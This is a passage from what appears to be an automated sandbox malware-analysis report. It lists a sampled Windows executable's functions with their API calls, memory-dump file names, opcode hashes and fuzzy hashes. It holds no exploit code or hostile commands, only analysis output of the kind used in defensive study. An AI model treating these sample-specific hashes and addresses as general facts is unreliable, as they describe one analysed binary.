                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: Wu
                                                                                              • API String ID: 2449869053-4083010176
                                                                                              • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                              • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                              Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                              • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                              Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Enable$Show$MessageMoveSend
                                                                                              • String ID:
                                                                                              • API String ID: 896007046-0
                                                                                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                              • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                              Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                              • GetFocus.USER32 ref: 00448ACF
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Enable$Show$FocusMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3429747543-0
                                                                                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                              • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                              Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                              • __swprintf.LIBCMT ref: 0045D4E9
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                              • String ID: %lu$\VH
                                                                                              • API String ID: 3164766367-2432546070
                                                                                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                              • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                              Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 3850602802-3636473452
                                                                                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                              • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                              Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                              • String ID:
                                                                                              • API String ID: 3985565216-0
                                                                                              • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                              • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                              • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                              • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                              Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0041F707
                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                              • _free.LIBCMT ref: 0041F71A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                              • String ID: [B
                                                                                              • API String ID: 1020059152-632041663
                                                                                              • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                              • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                              Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                              • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                              • __getptd.LIBCMT ref: 00413DBD
                                                                                              • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                              • _free.LIBCMT ref: 00413E07
                                                                                              • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                              • String ID:
                                                                                              • API String ID: 155776804-0
                                                                                              • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                              • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                              • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                              • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                              Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                              • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                              Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                              • GetClientRect.USER32(?,?), ref: 00430364
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                              • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                              • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                              • String ID:
                                                                                              • API String ID: 3220332590-0
                                                                                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                              • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                              Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1612042205-0
                                                                                              • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                              • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                              • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                              • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                              Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove_strncmp
                                                                                              • String ID: >$U$\
                                                                                              • API String ID: 2666721431-237099441
                                                                                              • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                              • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                              • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                              • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                              Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
